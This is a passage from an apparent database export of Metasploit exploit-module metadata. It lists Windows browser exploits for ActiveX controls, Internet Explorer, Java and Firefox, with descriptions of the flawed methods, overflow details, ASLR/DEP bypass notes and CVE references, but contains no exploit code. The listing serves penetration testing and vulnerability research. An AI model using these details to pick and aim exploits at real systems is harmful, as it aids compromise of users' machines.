00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/hpmqc_progcolor.rb","exploit","windows/browser/hpmqc_progcolor","exploit/windows/browser/hpmqc_progcolor","HP Mercury Quality Center ActiveX Control ProgColor Buffer Overflow",300,"This module exploits a stack-based buffer overflow in SPIDERLib.Loader ActiveX control (Spider90.ocx) 9.1.0.4353 installed by TestDirector (TD) for Hewlett-Packard Mercury Quality Center 9.0 before Patch 12.1, and 8.2 SP1 before Patch 32. By setting an overly long value to 'ProgColor', an attacker can overrun a buffer and execute arbitrary code.","Metasploit Framework License (BSD)","f","2007-04-04 00:00:00",0,,"passive","t","BID-23239, CVE-2007-1819, OSVDB-34317, URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=497","Trancer " 416,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/hyleos_chemviewx_activex.rb","exploit","windows/browser/hyleos_chemviewx_activex","exploit/windows/browser/hyleos_chemviewx_activex","Hyleos ChemView ActiveX Control Stack Buffer Overflow",400,"This module exploits a stack-based buffer overflow within version 1.9.5.1 of Hyleos ChemView (HyleosChemView.ocx). By calling the 'SaveAsMolFile' or 'ReadMolFile' methods with an overly long first argument, an attacker can overrun a buffer and execute arbitrary code.","Metasploit Framework License (BSD)","f","2010-02-10 00:00:00",0,,"passive","t","CVE-2010-0679, EDB-11422, OSVDB-62276, URL-http://www.security-assessment.com/files/advisories/2010-02-11_ChemviewX_Activex.pdf","Dz_attacker , Paul Craig , jduck " 417,"2013-05-29 16:42:01","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ibm_spss_c1sizer.rb","exploit","windows/browser/ibm_spss_c1sizer","exploit/windows/browser/ibm_spss_c1sizer","IBM SPSS SamplePower C1Tab ActiveX Heap Overflow",300,"This module exploits a heap based buffer overflow in the C1Tab ActiveX control, while handling the TabCaption property. The affected control can be found in the c1sizer.ocx component as included with IBM SPSS SamplePower 3.0. This module has been tested successfully on IE 6, 7 and 8 on Windows XP SP3 and IE 8 on Windows 7 SP1.","Metasploit Framework License (BSD)","f","2013-04-26 00:00:00",0,,"passive","t","BID-59559, CVE-2012-5946, OSVDB-92845, URL-http://www-01.ibm.com/support/docview.wss?uid=swg21635476","Alexander Gavrun, juan vazquez " 418,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb","exploit","windows/browser/ibm_tivoli_pme_activex_bof","exploit/windows/browser/ibm_tivoli_pme_activex_bof","IBM Tivoli Provisioning Manager Express for Software Distribution Isig.isigCtl.1 ActiveX RunAndUploadFile() Method Overflow",300,"This module exploits a buffer overflow vulnerability in the Isig.isigCtl.1 ActiveX installed with IBM Tivoli Provisioning Manager Express for Software Distribution 4.1.1. The vulnerability is found in the ""RunAndUploadFile"" method where the ""OtherFields"" parameter with user controlled data is used to build a ""Content-Dispoition"" header and attach contents in a insecure way which allows to overflow a buffer in the stack.","Metasploit Framework License (BSD)","f","2012-03-01 00:00:00",0,,"passive","t","BID-52252, CVE-2012-0198, OSVDB-79735, URL-http://www.zerodayinitiative.com/advisories/ZDI-12-040/","Andrea Micalizzi aka rgod, juan vazquez , sinn3r " 419,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ibmegath_getxmlvalue.rb","exploit","windows/browser/ibmegath_getxmlvalue","exploit/windows/browser/ibmegath_getxmlvalue","IBM Access Support ActiveX Control Buffer Overflow",300,"This module exploits a stack buffer overflow in IBM Access Support. When sending an overly long string to the GetXMLValue() method of IbmEgath.dll (3.20.284.0) an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2009-03-24 00:00:00",0,,"passive","t","BID-34228, CVE-2009-0215, OSVDB-52958","MC " 420,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb","exploit","windows/browser/ibmlotusdomino_dwa_uploadmodule","exploit/windows/browser/ibmlotusdomino_dwa_uploadmodule","IBM Lotus Domino Web Access Upload Module Buffer Overflow",300,"This module exploits a stack buffer overflow in IBM Lotus Domino Web Access Upload Module. By sending an overly long string to the ""General_ServerName()"" property located in the dwa7w.dll and the inotes6w.dll control, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2007-12-20 00:00:00",0,,"passive","t","BID-26972, CVE-2007-4474, EDB-4820, OSVDB-40954","Elazar Broad " 421,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ie_cbutton_uaf.rb","exploit","windows/browser/ie_cbutton_uaf","exploit/windows/browser/ie_cbutton_uaf","Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability",300,"This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CButton object is freed, but a reference is kept and used again during a page reload, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild targeting mainly China/Taiwan/and US-based computers.","Metasploit Framework License (BSD)","f","2012-12-27 00:00:00",0,,"passive","t","BID-57070, CVE-2012-4792, MSB-MS13-008, URL-http://blog.exodusintel.com/2013/01/02/happy-new-year-analysis-of-cve-2012-4792/, URL-http://blog.fireeye.com/research/2012/12/council-foreign-relations-water-hole-attack-details.html, URL-http://blog.vulnhunt.com/index.php/2012/12/29/new-ie-0day-coming-mshtmlcdwnbindinfo-object-use-after-free-vulnerability/, URL-http://blogs.technet.com/b/srd/archive/2012/12/29/new-vulnerability-affecting-internet-explorer-8-users.aspx, URL-http://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/, URL-http://technet.microsoft.com/en-us/security/advisory/2794220, URL-https://community.rapid7.com/community/metasploit/blog/2012/12/29/microsoft-internet-explorer-0-day-marks-the-end-of-2012, US-CERT-VU-154201","Peter Vreugdenhil, eromang, juan vazquez , mahmud ab rahman, sinn3r " 422,"2013-05-14 23:14:14","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb","exploit","windows/browser/ie_cgenericelement_uaf","exploit/windows/browser/ie_cgenericelement_uaf","MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability",400,"This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.","Metasploit Framework License (BSD)","f","2013-05-03 00:00:00",0,,"passive","t","CVE-2013-1347, MSB-MS13-038, OSVDB-92993, URL-http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx, URL-http://r-7.co/IE8-DOL, US-CERT-VU-237655","EMH, Unknown, juan vazquez , sinn3r " 423,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ie_createobject.rb","exploit","windows/browser/ie_createobject","exploit/windows/browser/ie_createobject","Internet Explorer COM CreateObject Code Execution",600,"This module exploits a generic code execution vulnerability in Internet Explorer by abusing vulnerable ActiveX objects.","Metasploit Framework License (BSD)","f","2006-04-11 00:00:00",0,,"passive","t","CVE-2006-0003, CVE-2006-4704, MSB-MS06-014, MSB-MS06-073, OSVDB-24517, OSVDB-30155","hdm " 424,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ie_execcommand_uaf.rb","exploit","windows/browser/ie_execcommand_uaf","exploit/windows/browser/ie_execcommand_uaf","MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability ",400,"This module exploits a vulnerability found in Microsoft Internet Explorer (MSIE). When rendering an HTML page, the CMshtmlEd object gets deleted in an unexpected manner, but the same memory is reused again later in the CMshtmlEd::Exec() function, leading to a use-after-free condition. Please note that this vulnerability has been exploited in the wild since Sep 14 2012. Also note that presently, this module has some target dependencies for the ROP chain to be valid. For WinXP SP3 with IE8, msvcrt must be present (as it is by default). For Vista or Win7 with IE8, or Win7 with IE9, JRE 1.6.x or below must be installed (which is often the case).","Metasploit Framework License (BSD)","f","2012-09-14 00:00:00",0,,"passive","t","CVE-2012-4969, MSB-MS12-063, OSVDB-85532, URL-http://blog.vulnhunt.com/index.php/2012/09/17/ie-execcommand-fuction-use-after-free-vulnerability-0day/, URL-http://eromang.zataz.com/2012/09/16/zero-day-season-is-really-not-over-yet/, URL-http://metasploit.com, URL-http://technet.microsoft.com/en-us/security/advisory/2757760","binjo, eromang, juan vazquez , sinn3r , unknown" 425,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ie_iscomponentinstalled.rb","exploit","windows/browser/ie_iscomponentinstalled","exploit/windows/browser/ie_iscomponentinstalled","Internet Explorer isComponentInstalled Overflow",300,"This module exploits a stack buffer overflow in Internet Explorer. This bug was patched in Windows 2000 SP4 and Windows XP SP1 according to MSRC.","Metasploit Framework License (BSD)","f","2006-02-24 00:00:00",0,,"passive","t","BID-16870, CVE-2006-1016, OSVDB-31647","hdm " 426,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ie_unsafe_scripting.rb","exploit","windows/browser/ie_unsafe_scripting","exploit/windows/browser/ie_unsafe_scripting","Internet Explorer Unsafe Scripting Misconfiguration",600,"This exploit takes advantage of the ""Initialize and script ActiveX controls not marked safe for scripting"" setting within Internet Explorer. When this option is set, IE allows access to the WScript.Shell ActiveX control, which allows javascript to interact with the file system and run commands. This security flaw is not uncommon in corporate environments for the 'Intranet' or 'Trusted Site' zones. In order to save binary data to the file system, ADODB.Stream access is required, which in IE7 will trigger a cross domain access violation. As such, we write the code to a .vbs file and execute it from there, where no such restrictions exist. When set via domain policy, the most common registry entry to modify is HKLM\ Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1201, which if set to '0' forces ActiveX controls not marked safe for scripting to be enabled for the Intranet zone. This module creates a javascript/html hybrid that will render correctly either via a direct GET http://msf-server/ or as a javascript include, such as in: http://intranet-server/xss.asp?id=""> .","Metasploit Framework License (BSD)","f","2010-09-20 00:00:00",0,,"passive","t","URL-http://blog.invisibledenizen.org/2009/01/ieunsafescripting-metasploit-module.html, URL-http://support.microsoft.com/kb/182569","natron " 427,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb","exploit","windows/browser/imgeviewer_tifmergemultifiles","exploit/windows/browser/imgeviewer_tifmergemultifiles","Viscom Image Viewer CP Pro 8.0/Gold 6.0 ActiveX Control",300,"This module exploits a stack based buffer overflow in the Active control file ImageViewer2.OCX by passing a overly long argument to an insecure TifMergeMultiFiles() method. Exploitation results in code execution with the privileges of the user who browsed to the exploit page. The victim will first be required to trust the publisher Viscom Software. This module has been designed to bypass DEP and ASLR under XP IE8, Vista and Win7 with Java support.","Metasploit Framework License (BSD)","f","2010-03-03 00:00:00",0,,"passive","t","EDB-15668, URL-http://secunia.com/advisories/42445/, URL-http://xforce.iss.net/xforce/xfdb/63666","Dr_IDE, TecR0c , mr_me " 428,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb","exploit","windows/browser/indusoft_issymbol_internationalseparator","exploit/windows/browser/indusoft_issymbol_internationalseparator","InduSoft Web Studio ISSymbol.ocx InternationalSeparator() Heap Overflow",300,"This module exploits a heap overflow found in InduSoft Web Studio <= 61.6.00.00 SP6. The overflow exists in the ISSymbol.ocx, and can be triggered with a long string argument for the InternationalSeparator() method of the ISSymbol control. This modules uses the msvcr71.dll form the Java JRE6 to bypass ASLR.","Metasploit Framework License (BSD)","f","2012-04-28 00:00:00",0,,"passive","t","BID-47596, CVE-2011-0340, OSVDB-72865, URL-http://secunia.com/secunia_research/2011-37/, URL-http://www.zerodayinitiative.com/advisories/ZDI-12-168/","Alexander Gavrun, Dmitriy Pletnev, James Fitts , juan vazquez " 429,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/inotes_dwa85w_bof.rb","exploit","windows/browser/inotes_dwa85w_bof","exploit/windows/browser/inotes_dwa85w_bof","IBM Lotus iNotes dwa85W ActiveX Buffer Overflow",300,"This module exploits a buffer overflow vulnerability on the UploadControl ActiveX. The vulnerability exists in the handling of the ""Attachment_Times"" property, due to the insecure usage of the _swscanf. The affected ActiveX is provided by the dwa85W.dll installed with the IBM Lotus iNotes ActiveX installer. This module has been tested successfully on IE6-IE9 on Windows XP, Vista and 7, using the dwa85W.dll 85.3.3.0 as installed with Lotus Domino 8.5.3. In order to bypass ASLR the no aslr compatible module dwabho.dll is used. This one is installed with the iNotes ActiveX.","Metasploit Framework License (BSD)","f","2012-06-01 00:00:00",0,,"passive","t","BID-53879, CVE-2012-2175, OSVDB-82755, URL-http://www-304.ibm.com/support/docview.wss?uid=swg21596862, URL-http://www.zerodayinitiative.com/advisories/ZDI-12-132/","Gaurav Baruah, juan vazquez " 430,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/intrust_annotatex_add.rb","exploit","windows/browser/intrust_annotatex_add","exploit/windows/browser/intrust_annotatex_add","Quest InTrust Annotation Objects Uninitialized Pointer",200,"This module exploits an uninitialized variable vulnerability in the Annotation Objects ActiveX component. The activeX component loads into memory without opting into ALSR so this module exploits the vulnerability against windows Vista and Windows 7 targets. A large heap spray is required to fulfill the requirement that EAX points to part of the ROP chain in a heap chunk and the calculated call will hit the pivot in a separate heap chunk. This will take some time in the users browser.","Metasploit Framework License (BSD)","f","2012-03-28 00:00:00",0,,"passive","t","BID-52765, EDB-18674, OSVDB-80662","mr_me , rgod " 431,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/java_basicservice_impl.rb","exploit","windows/browser/java_basicservice_impl","exploit/windows/browser/java_basicservice_impl","Sun Java Web Start BasicServiceImpl Code Execution",600,"This module exploits a vulnerability in Java Runtime Environment that allows an attacker to escape the Java Sandbox. By injecting a parameter into a javaws call within the BasicServiceImpl class the default java sandbox policy file can be therefore overwritten. The vulnerability affects version 6 prior to update 22. NOTE: Exploiting this vulnerability causes several sinister-looking popup windows saying that Java is ""Downloading application.""","Metasploit Framework License (BSD)","f","2010-10-12 00:00:00",0,,"passive","t","CVE-2010-3563, OSVDB-69043, URL-http://mk41ser.blogspot.com","Matthias Kaiser, egypt " 432,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/java_cmm.rb","exploit","windows/browser/java_cmm","exploit/windows/browser/java_cmm","Java CMM Remote Code Execution",300,"This module abuses the Color Management classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in February and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41 and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1 systems. This exploit doesn't bypass click-to-play, so the user must accept the java warning in order to run the malicious applet.","Metasploit Framework License (BSD)","f","2013-03-01 00:00:00",1,,"passive","t","BID-58238, CVE-2013-1493, OSVDB-90737, URL-http://pastie.org/pastes/6581034, URL-http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html, URL-https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493","Unknown, juan vazquez " 433,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/java_codebase_trust.rb","exploit","windows/browser/java_codebase_trust","exploit/windows/browser/java_codebase_trust","Sun Java Applet2ClassLoader Remote Code Execution",600,"This module exploits a vulnerability in the Java Runtime Environment that allows an attacker to run an applet outside of the Java Sandbox. When an applet is invoked with: 1. A ""codebase"" parameter that points at a trusted directory 2. A ""code"" parameter that is a URL that does not contain any dots the applet will run outside of the sandbox. This vulnerability affects JRE prior to version 6 update 24.","Metasploit Framework License (BSD)","f","2011-02-15 00:00:00",0,,"passive","t","CVE-2010-4452, OSVDB-71193, URL-http://fhoguin.com/2011/03/oracle-java-unsigned-applet-applet2classloader-remote-code-execution-vulnerability-zdi-11-084-explained/, URL-http://www.oracle.com/technetwork/topics/security/javacpufeb2011-304611.html, URL-http://www.zerodayinitiative.com/advisories/ZDI-11-084/","Frederic Hoguin, jduck " 434,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/java_docbase_bof.rb","exploit","windows/browser/java_docbase_bof","exploit/windows/browser/java_docbase_bof","Sun Java Runtime New Plugin docbase Buffer Overflow",500,"This module exploits a flaw in the new plugin component of the Sun Java Runtime Environment before v6 Update 22. By specifying specific parameters to the new plugin, an attacker can cause a stack-based buffer overflow and execute arbitrary code. When the new plugin is invoked with a ""launchjnlp"" parameter, it will copy the contents of the ""docbase"" parameter to a stack-buffer using the ""sprintf"" function. A string of 396 bytes is enough to overflow the 256 byte stack buffer and overwrite some local variables as well as the saved return address. NOTE: The string being copied is first passed through the ""WideCharToMultiByte"". Due to this, only characters which have a valid localized multibyte representation are allowed. Invalid characters will be replaced with question marks ('?'). This vulnerability was originally discovered independently by both Stephen Fewer and Berend Jan Wever (SkyLined). Although exhaustive testing hasn't been done, all versions since version 6 Update 10 are believed to be affected by this vulnerability. This vulnerability was patched as part of the October 2010 Oracle Patch release.","Metasploit Framework License (BSD)","f","2010-10-12 00:00:00",0,,"passive","t","BID-44023, CVE-2010-3552, OSVDB-68873, URL-http://blog.harmonysecurity.com/2010/10/oracle-java-ie-browser-plugin-stack.html, URL-http://code.google.com/p/skylined/issues/detail?id=23, URL-http://skypher.com/index.php/2010/10/13/issue-2-oracle-java-object-launchjnlp-docbase/, URL-http://www.oracle.com/technetwork/topics/security/javacpuoct2010-176258.html, URL-http://www.zerodayinitiative.com/advisories/ZDI-10-206/","jduck " 435,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/java_mixer_sequencer.rb","exploit","windows/browser/java_mixer_sequencer","exploit/windows/browser/java_mixer_sequencer","Java MixerSequencer Object GM_Song Structure Handling Vulnerability",500,"This module exploits a flaw within the handling of MixerSequencer objects in Java 6u18 and before. Exploitation id done by supplying a specially crafted MIDI file within an RMF File. When the MixerSequencer objects is used to play the file, the GM_Song structure is populated with a function pointer provided by a SONG block in the RMF. A Midi block that contains a MIDI with a specially crafted controller event is used to trigger the vulnerability. When triggering the vulnerability ""ebx"" points to a fake event in the MIDI file which stores the shellcode. A ""jmp ebx"" from msvcr71.dll is used to make the exploit reliable over java updates.","Metasploit Framework License (BSD)","f","2010-03-30 00:00:00",0,,"passive","t","BID-39077, CVE-2010-0842, OSVDB-63493, URL-http://vreugdenhilresearch.nl/java-midi-parse-vulnerabilities/, URL-http://www.zerodayinitiative.com/advisories/ZDI-10-060/","Peter Vreugdenhil, juan vazquez " 436,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb","exploit","windows/browser/java_ws_arginject_altjvm","exploit/windows/browser/java_ws_arginject_altjvm","Sun Java Web Start Plugin Command Line Argument Injection",600,"This module exploits a flaw in the Web Start plugin component of Sun Java Web Start. The arguments passed to Java Web Start are not properly validated. By passing the lesser known -J option, an attacker can pass arbitrary options directly to the Java runtime. By utilizing the -XXaltjvm option, as discussed by Ruben Santamarta, an attacker can execute arbitrary code in the context of an unsuspecting browser user. This vulnerability was originally discovered independently by both Ruben Santamarta and Tavis Ormandy. Tavis reported that all versions since version 6 Update 10 ""are believed to be affected by this vulnerability."" In order for this module to work, it must be ran as root on a server that does not serve SMB. Additionally, the target host must have the WebClient service (WebDAV Mini-Redirector) enabled.","Metasploit Framework License (BSD)","f","2010-04-09 00:00:00",0,,"passive","t","BID-39346, CVE-2010-0886, CVE-2010-1423, OSVDB-63648, URL-http://archives.neohapsis.com/archives/fulldisclosure/2010-04/0122.html, URL-http://www.reversemode.com/index.php?option=com_content&task=view&id=67&Itemid=1","jduck " 437,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/java_ws_vmargs.rb","exploit","windows/browser/java_ws_vmargs","exploit/windows/browser/java_ws_vmargs","Sun Java Web Start Plugin Command Line Argument Injection",600,"This module exploits a flaw in the Web Start component of the Sun Java Runtime Environment. The arguments passed to Java Web Start are not properly validated, allowing injection of arbitrary arguments to the JVM. By utilizing the lesser known -J option, an attacker can take advantage of the -XXaltjvm option, as discussed previously by Ruben Santamarta. This method allows an attacker to execute arbitrary code in the context of an unsuspecting browser user. In order for this module to work, it must be ran as root on a server that does not serve SMB. Additionally, the target host must have the WebClient service (WebDAV Mini-Redirector) enabled.","Metasploit Framework License (BSD)","f","2012-02-14 00:00:00",0,,"passive","t","BID-52015, CVE-2012-0500, OSVDB-79227, URL-http://seclists.org/fulldisclosure/2012/Feb/251, URL-http://www.oracle.com/technetwork/topics/security/javacpufeb2012-366318.html","jduck " 438,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb","exploit","windows/browser/juniper_sslvpn_ive_setupdll","exploit/windows/browser/juniper_sslvpn_ive_setupdll","Juniper SSL-VPN IVE JuniperSetupDLL.dll ActiveX Control Buffer Overflow",300,"This module exploits a stack buffer overflow in the JuniperSetupDLL.dll library which is called by the JuniperSetup.ocx ActiveX control, as part of the Juniper SSL-VPN (IVE) appliance. By specifying an overly long string to the ProductName object parameter, the stack is overwritten.","Metasploit Framework License (BSD)","f","2006-04-26 00:00:00",0,,"passive","t","BID-17712, CVE-2006-2086, OSVDB-25001, URL-http://archives.neohapsis.com/archives/fulldisclosure/2006-04/0743.html","patrick " 439,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/kazaa_altnet_heap.rb","exploit","windows/browser/kazaa_altnet_heap","exploit/windows/browser/kazaa_altnet_heap","Kazaa Altnet Download Manager ActiveX Control Buffer Overflow",300,"This module exploits a stack buffer overflow in the Altnet Download Manager ActiveX Control (amd4.dll) bundled with Kazaa Media Desktop 3.2.7. By sending a overly long string to the ""Install()"" method, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2007-10-03 00:00:00",0,,"passive","t","CVE-2007-5217, OSVDB-37785, URL-http://secunia.com/advisories/26970/","MC " 440,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/keyhelp_launchtripane_exec.rb","exploit","windows/browser/keyhelp_launchtripane_exec","exploit/windows/browser/keyhelp_launchtripane_exec","KeyHelp ActiveX LaunchTriPane Remote Code Execution Vulnerability",600,"This module exploits a code execution vulnerability in the KeyScript ActiveX control from keyhelp.ocx. It is packaged in several products or GE, such as Proficy Historian 4.5, 4.0, 3.5, and 3.1, Proficy HMI/SCADA 5.1 and 5.0, Proficy Pulse 1.0, Proficy Batch Execution 5.6, and SI7 I/O Driver between 7.20 and 7.42. When the control is installed with these products, the function ""LaunchTriPane"" will use ShellExecute to launch ""hh.exe"", with user controlled data as parameters. Because of this, the ""-decompile"" option can be abused to write arbitrary files on the remote system. Code execution can be achieved by first uploading the payload to the remote machine, and then upload another mof file, which enables Windows Management Instrumentation service to execute it. Please note that this module currently only works for Windows before Vista. On the other hand, the target host must have the WebClient service (WebDAV Mini-Redirector) enabled. It is enabled and automatically started by default on Windows XP SP3","Metasploit Framework License (BSD)","f","2012-06-26 00:00:00",0,,"passive","t","BID-55265, CVE-2012-2516, OSVDB-83311, URL-http://support.ge-ip.com/support/index?page=kbchannel&id=S:KB14863, URL-http://www.zerodayinitiative.com/advisories/ZDI-12-169/","juan vazquez , rgod " 441,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/logitechvideocall_start.rb","exploit","windows/browser/logitechvideocall_start","exploit/windows/browser/logitechvideocall_start","Logitech VideoCall ActiveX Control Buffer Overflow",300,"This module exploits a stack buffer overflow in the Logitech VideoCall ActiveX Control (wcamxmp.dll 2.0.3470.448). By sending a overly long string to the ""Start()"" method, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2007-05-31 00:00:00",0,,"passive","t","BID-24254, CVE-2007-2918, OSVDB-36820","MC " 442,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/lpviewer_url.rb","exploit","windows/browser/lpviewer_url","exploit/windows/browser/lpviewer_url","iseemedia / Roxio / MGI Software LPViewer ActiveX Control Buffer Overflow",300,"This module exploits a stack buffer overflow in LPViewer ActiveX control (LPControll.dll 3.2.0.2). When sending an overly long string to the URL() property an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2008-10-06 00:00:00",0,,"passive","t","BID-31604, CVE-2008-4384, OSVDB-48946, US-CERT-VU-848873","MC " 443,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/macrovision_downloadandexecute.rb","exploit","windows/browser/macrovision_downloadandexecute","exploit/windows/browser/macrovision_downloadandexecute","Macrovision InstallShield Update Service Buffer Overflow",300,"This module exploits a stack buffer overflow in Macrovision InstallShield Update Service(Isusweb.dll 6.0.100.54472). By passing an overly long ProductCode string to the DownloadAndExecute method, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2007-10-31 00:00:00",0,,"passive","t","CVE-2007-5660, OSVDB-38347, URL-http://lists.grok.org.uk/pipermail/full-disclosure/2007-December/059288.html","MC " 444,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/macrovision_unsafe.rb","exploit","windows/browser/macrovision_unsafe","exploit/windows/browser/macrovision_unsafe","Macrovision InstallShield Update Service ActiveX Unsafe Method",600,"This module allows attackers to execute code via an unsafe methods in Macrovision InstallShield 2008.","Metasploit Framework License (BSD)","f","2007-10-20 00:00:00",0,,"passive","t","BID-26280, CVE-2007-5660, OSVDB-38347","MC " 445,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/maxthon_history_xcs.rb","exploit","windows/browser/maxthon_history_xcs","exploit/windows/browser/maxthon_history_xcs","Maxthon3 about:history XCS Trusted Zone Code Execution",600,"Cross Context Scripting (XCS) is possible in the Maxthon about:history page. Injection in such privileged/trusted browser zone can be used to modify configuration settings and execute arbitrary commands. Please note this module only works against specific versions of XCS. Currently, we've only successfully tested on Maxthon 3.1.7 build 600 up to 3.2.2 build 1000.","Metasploit Framework License (BSD)","f","2012-11-26 00:00:00",0,,"passive","t","URL-http://blog.malerisch.net/2012/12/maxthon-cross-context-scripting-xcs-about-history-rce.html","Roberto Suggi Liverani, juan vazquez , sinn3r " 446,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb","exploit","windows/browser/mcafee_mcsubmgr_vsprintf","exploit/windows/browser/mcafee_mcsubmgr_vsprintf","McAfee Subscription Manager Stack Buffer Overflow",300,"This module exploits a flaw in the McAfee Subscription Manager ActiveX control. Due to an unsafe use of vsprintf, it is possible to trigger a stack buffer overflow by passing a large string to one of the COM-exposed routines, such as IsAppExpired. This vulnerability was discovered by Karl Lynn of eEye.","Metasploit Framework License (BSD)","f","2006-08-01 00:00:00",0,,"passive","t","BID-19265, CVE-2006-3961, OSVDB-27698, URL-http://lists.grok.org.uk/pipermail/full-disclosure/2006-August/048565.html","skape " 447,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/mcafee_mvt_exec.rb","exploit","windows/browser/mcafee_mvt_exec","exploit/windows/browser/mcafee_mvt_exec","McAfee Virtual Technician MVTControl 6.3.0.1911 GetObject Vulnerability",600,"This modules exploits a vulnerability found in McAfee Virtual Technician's MVTControl. This ActiveX control can be abused by using the GetObject() function to load additional unsafe classes such as WScript.Shell, therefore allowing remote code execution under the context of the user.","Metasploit Framework License (BSD)","f","2012-04-30 00:00:00",0,,"passive","t","EDB-18805, OSVDB-81657, URL-https://kc.mcafee.com/corporate/index?page=content&id=SB10028","rgod, sinn3r " 448,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb","exploit","windows/browser/mcafeevisualtrace_tracetarget","exploit/windows/browser/mcafeevisualtrace_tracetarget","McAfee Visual Trace ActiveX Control Buffer Overflow",300,"This module exploits a stack buffer overflow in the McAfee Visual Trace 3.25 ActiveX Control (NeoTraceExplorer.dll 1.0.0.1). By sending a overly long string to the ""TraceTarget()"" method, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2007-07-07 00:00:00",0,,"passive","t","CVE-2006-6707, OSVDB-32399, URL-http://secunia.com/advisories/23463","MC " 449,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/mirc_irc_url.rb","exploit","windows/browser/mirc_irc_url","exploit/windows/browser/mirc_irc_url","mIRC IRC URL Buffer Overflow",300,"This module exploits a stack buffer overflow in mIRC 6.1. By submitting an overly long and specially crafted URL to the 'irc' protocol, an attacker can overwrite the buffer and control program execution.","Metasploit Framework License (BSD)","f","2003-10-13 00:00:00",0,,"passive","t","BID-8819, CVE-2003-1336, OSVDB-2665","MC " 450,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/mozilla_attribchildremoved.rb","exploit","windows/browser/mozilla_attribchildremoved","exploit/windows/browser/mozilla_attribchildremoved","Firefox 8/9 AttributeChildRemoved() Use-After-Free",200,"This module exploits a use-after-free vulnerability in Firefox 8/8.0.1 and 9/9.0.1. Removal of child nodes from the nsDOMAttribute can allow for a child to still be accessible after removal due to a premature notification of 